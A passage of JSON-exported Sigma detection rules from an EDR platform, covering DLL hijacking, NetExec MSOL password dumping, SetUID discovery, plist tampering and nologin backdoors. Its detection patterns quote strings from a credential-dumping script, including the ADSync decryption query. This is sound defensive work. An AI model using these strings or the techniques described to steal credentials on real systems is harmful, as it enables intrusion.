"rule_description": "Detects potential Windows DLL Hijacking via devicecredentialdeployment.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46210e9e-d4b8-466d-aa48-5786cbdea116",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091067Z",
"creation_date": "2026-03-23T11:45:34.091069Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091073Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/msol_dump/msol_dump.ps1",
"https://attack.mitre.org/techniques/T1555/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1555_netexec_msol_password.yml",
"content": "title: MSOL Password Dumped via NetExec\nid: 46210e9e-d4b8-466d-aa48-5786cbdea116\ndescription: |\n Detects a dump of the MSOL account's password performed using NetExec tools.\n The MSOL account is a highly privileged account used to synchronize on-premise Active Directory environments with Microsoft Entra Connect.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/msol_dump/msol_dump.ps1\n - https://attack.mitre.org/techniques/T1555/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - \"SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'\"\n - 'Write-Host \"[!] Error using xp_cmdshell to launch our decryption powershell\"'\n - 'Write-Host \"[*] Using xp_cmdshell to run some Powershell as the service user\"'\n - 'Write-Host \"[!] Error querying mms_management_agent\"'\n - 'Write-Host \"[*] Querying ADSync localdb (mms_management_agent)\"'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46210e9e-d4b8-466d-aa48-5786cbdea116",
"rule_name": "MSOL Password Dumped via NetExec",
"rule_description": "Detects a dump of the MSOL account's password performed using NetExec tools.\nThe MSOL account is a highly privileged account used to synchronize on-premises Active Directory environments with Microsoft Entra Connect.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46cc50ba-8674-4b25-b88f-d55e3a874f21",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294148Z",
"creation_date": "2026-03-23T11:45:35.294156Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294168Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1083/",
"https://attack.mitre.org/techniques/T1548/"
],
"name": "t1083_find_setuid_setgid_linux.yml",
"content": "title: SetUID and SetGID Files Discovered via find\nid: 46cc50ba-8674-4b25-b88f-d55e3a874f21\ndescription: |\n Detects the execution of 'find' with special arguments to discover files with the SetUID or SetGID access flag set.\n Those access flags allow a user to run a binary using the executable's owner or group permissions instead of its own.\n Attackers can use misconfigured SetUID or SetGID flags to execute a file with a higher privileged user and achieve privilege escalation.\n It is recommended to investigate the command-line and the ancestors of the find program, as well as suspicious executions following this discovery to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1548/\ndate: 2023/01/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Find\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n Image|endswith: '/find'\n CommandLine|contains: ' -perm '\n ParentImage|contains: '?'\n\n selection_perm:\n CommandLine|contains:\n # Symbolic mode\n - ' /u=s'\n - ' -u=s'\n - ' /g=s'\n - ' -g=s'\n\n # Raw permission number\n - ' 4755'\n - ' -4755'\n - ' /4755'\n - ' 2755'\n - ' /2755'\n - ' -2755'\n\n # Masks\n - ' /?000'\n - ' -?000'\n - ' /0?000'\n - ' -0?000'\n - ' /00?000'\n - ' -00?000'\n\n exclusion_rapid7:\n ParentCommandLine:\n - 'bash -c LANG=C;LANGUAGE=en;find / *| xargs -0 -n 500 ls -lLdN'\n - \"/bin/bash -c echo 'Rapid7Echo'; (LANG=C;LANGUAGE=en;find / *| xargs -0 -n 500 ls -lLdN*\"\n\n exclusion_audit:\n # find /run/lock -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -printf %p is %m should be 1777\\n\n CommandLine: '* -xdev -type d ( -perm -0002 -a ! 
-perm -1000 ) -printf %p is %m should be 1777\\n'\n\n exclusion_cis:\n # /bin/sh /tmp/CIS-Audit/cis-cat-full/sce/auditd_privilieged_commands_rules_file.sh\n ParentCommandLine|contains: 'auditd_privilieged_commands_rules_file.sh'\n\n exclusion_qualys:\n Ancestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_fstype:\n CommandLine|contains|all:\n - '-fstype nfs '\n - '-fstype nfs4 '\n - '-fstype gpfs '\n - '-fstype afs '\n - '-fstype secfs '\n - '-fstype smbfs '\n\n exclusion_xargs:\n ParentImage: '/usr/bin/xargs'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n#level: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46cc50ba-8674-4b25-b88f-d55e3a874f21",
"rule_name": "SetUID and SetGID Files Discovered via find",
"rule_description": "Detects the execution of 'find' with special arguments to discover files with the SetUID or SetGID access flag set.\nThose access flags allow a user to run a binary using the executable's owner or group permissions instead of its own.\nAttackers can use misconfigured SetUID or SetGID flags to execute a file with a higher privileged user and achieve privilege escalation.\nIt is recommended to investigate the command-line and the ancestors of the find program, as well as suspicious executions following this discovery to determine if this action was legitimate.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1083",
"attack.t1548"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46cddb02-e1a7-4b35-bd26-bb267f7f1f50",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598163Z",
"creation_date": "2026-03-23T11:45:34.598169Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598180Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1647/"
],
"name": "t1647_plutil_plist_modification.yml",
"content": "title: Plist File Modified via plutil\nid: 46cddb02-e1a7-4b35-bd26-bb267f7f1f50\ndescription: |\n Detects a suspicious modification of a plist file using plutil.\n Adversaries may modify key-value pairs in plist files to influence system behaviors, in order to hide the execution of an application or to run additional commands for persistence.\n It is recommended to check if the modification is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1647/\ndate: 2024/06/20\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Plutil\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_bin:\n Image|endswith: '/plutil'\n CommandLine|contains:\n - 'replace'\n - 'insert'\n selection_path:\n - CommandLine|contains: # full path\n - '/Contents/Info.plist'\n - '/Library/Preferences/com.apple.dock.plist'\n - '/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm'\n - CommandLine|contains:\n - 'Info.plist'\n - 'com.apple.dock.plist'\n - 'com.apple.backgroundtaskmanagementagent/backgrounditems.btm'\n CurrentDirectory|contains: # relative path, use current directory\n - '/Applications/'\n - '/Library/Preferences/'\n - '/Library/Application Support/'\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46cddb02-e1a7-4b35-bd26-bb267f7f1f50",
"rule_name": "Plist File Modified via plutil",
"rule_description": "Detects a suspicious modification of a plist file using plutil.\nAdversaries may modify key-value pairs in plist files to influence system behaviors, in order to hide the execution of an application or to run additional commands for persistence.\nIt is recommended to check if the modification is legitimate.\n",
"rule_creation_date": "2024-06-20",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "46d63e16-d3ad-475f-b398-cc1ad556bf8d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597026Z",
"creation_date": "2026-03-23T11:45:34.597031Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597044Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securitylabs.datadoghq.com/articles/analysis-of-teamtnt-doppelganger/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_nologin_child_process.yml",
"content": "title: Suspicious Process Launched by Nologin\nid: 46d63e16-d3ad-475f-b398-cc1ad556bf8d\ndescription: |\n Detects the creation of a child process by the nologin binary.\n Attackers may replace the nologin binary by a malicious one while backdooring a machine. Logging in with an account having nologin configured as its shell will trigger the persistence.\n It is recommended to analyze the system to check if the binary has been replaced by a malicious one.\nreferences:\n - https://securitylabs.datadoghq.com/articles/analysis-of-teamtnt-doppelganger/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2024/02/02\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Persistence\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n ProcessParentImage: '/usr/sbin/nologin'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "46d63e16-d3ad-475f-b398-cc1ad556bf8d",
"rule_name": "Suspicious Process Launched by Nologin",
"rule_description": "Detects the creation of a child process by the nologin binary.\nAttackers may replace the nologin binary with a malicious one while backdooring a machine. Logging in with an account that has nologin configured as its shell will then trigger the persistence.\nIt is recommended to analyze the system to check whether the binary has been replaced by a malicious one.\n",
"rule_creation_date": "2024-02-02",
"rule_modified_date": "2025-03-31",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "47004d03-010a-43e2-bca8-9d97cbce746a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621156Z",
"creation_date": "2026-03-23T11:45:34.621158Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621162Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blumira.com/integration/how-to-disable-null-session-in-windows/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1112_lsa_security_lowered_to_include_anonymous_users.yml",
"content": "title: LSA Security Lowered to Include Anonymous Users in Registry\nid: 47004d03-010a-43e2-bca8-9d97cbce746a\ndescription: |\n Detects the modification of the LSA Registry configuration allowing for Null Sessions to be considered as a user from a security perspective.\n Attackers can set this security setting to allow anonymous sessions to inherit from permissions that all named users already have, and possibly perform privilege escalation.\n It is recommended to analyze the process and user session responsible for this registry edit, to look for other signs of suspicious activities on the hosts, and to roll back the security downgrade if this change is not legitimate.\nreferences:\n - https://www.blumira.com/integration/how-to-disable-null-session-in-windows/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2022/11/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078\n - attack.defense_evasion\n - attack.t1112\n - attack.t1562\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\EveryoneIncludesAnonymous'\n Details|contains: 'DWORD'\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security policies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not filter_zero and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "47004d03-010a-43e2-bca8-9d97cbce746a",
"rule_name": "LSA Security Lowered to Include Anonymous Users in Registry",
"rule_description": "Detects the modification of the LSA registry configuration (EveryoneIncludesAnonymous set to a non-zero value) allowing null (anonymous) sessions to be treated as members of the Everyone group from a security perspective.\nAttackers can set this security setting so that anonymous sessions inherit the permissions that all named users already have, possibly leading to privilege escalation.\nIt is recommended to analyze the process and user session responsible for this registry edit, to look for other signs of suspicious activity on the host, and to roll back the security downgrade if this change is not legitimate.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1112",
"attack.t1562"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "470243fa-340b-44b2-a367-42a58b4fa7db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619662Z",
"creation_date": "2026-03-23T11:45:34.619664Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619668Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_read_notes.yml",
"content": "title: Suspicious Read Access to Notes Files\nid: 470243fa-340b-44b2-a367-42a58b4fa7db\ndescription: |\n Detects a process reading sensitive files related to the Notes application.\n Adversaries may target user notes on local systems to collect sensitive information.\n It is recommended to check whether the process that accessed the file had legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1005/\ndate: 2024/07/03\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith:\n - '/Users/*/Library/Group Containers/group.com.apple.notes/'\n - '/Users/*/Library/Containers/com.apple.Notes/Data/Library/Notes/'\n Path|endswith:\n - 'NoteStore.sqlite'\n - 'NoteStore.sqlite-shm'\n - 'NoteStore.sqlite-wal'\n ProcessImage|contains: '?'\n\n filter_notes:\n Image:\n - '/System/Applications/Notes.app/Contents/PlugIns/com.apple.Notes.*'\n - '/System/Applications/Notes.app/Contents/MacOS/Notes'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n 
exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_security_tools:\n Image: '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n\n ### misc\n exclusion_vscode:\n Image: '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n exclusion_bitdefender:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bitdefender.bddaemon'\n\n exclusion_app_folder:\n ProcessImage|startswith:\n - '/Applications/'\n - '/Library/'\n\n exclusion_rsync:\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.rsync'\n - ProcessImage: '/opt/homebrew/Cellar/rsync/*/bin/rsync'\n\n exclusion_grep:\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.grep'\n - ProcessImage: '/usr/local/Cellar/ripgrep/*/bin/rg'\n\n exclusion_ditto:\n ProcessCommandLine|contains: '/ditto -rsrcFork '\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.apple.ditto'\n\n exclusion_raycast:\n ProcessCommandLine|startswith: 'sqlite3 --json --readonly '\n ProcessGrandparentImage: '/Applications/Raycast.app/Contents/MacOS/Raycast'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "470243fa-340b-44b2-a367-42a58b4fa7db",
"rule_name": "Suspicious Read Access to Notes Files",
"rule_description": "Detects a process reading the Apple Notes database files (NoteStore.sqlite and its -wal/-shm companions) on macOS.\nAdversaries may target user notes on local systems to collect sensitive information.\nIt is recommended to check whether the process that accessed the file had a legitimate reason to do so.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "473427dc-881b-4f08-b432-cd1bd3a57bf2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087134Z",
"creation_date": "2026-03-23T11:45:34.087136Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087141Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_compmgmtlauncher.yml",
"content": "title: DLL Hijacking via compmgmtlauncher.exe\nid: 473427dc-881b-4f08-b432-cd1bd3a57bf2\ndescription: |\n Detects potential Windows DLL Hijacking via compmgmtlauncher.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'compmgmtlauncher.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\apphelp.dll'\n - '\\CLDAPI.dll'\n - '\\CRYPTBASE.dll'\n - '\\cscobj.dll'\n - '\\cscui.dll'\n - '\\edputil.dll'\n - '\\FLTLIB.DLL'\n - '\\ntshrui.dll'\n - '\\PROPSYS.dll'\n - '\\rsaenh.dll'\n - '\\sspicli.dll'\n - '\\twext.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "473427dc-881b-4f08-b432-cd1bd3a57bf2",
"rule_name": "DLL Hijacking via compmgmtlauncher.exe",
"rule_description": "Detects potential Windows DLL hijacking via compmgmtlauncher.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
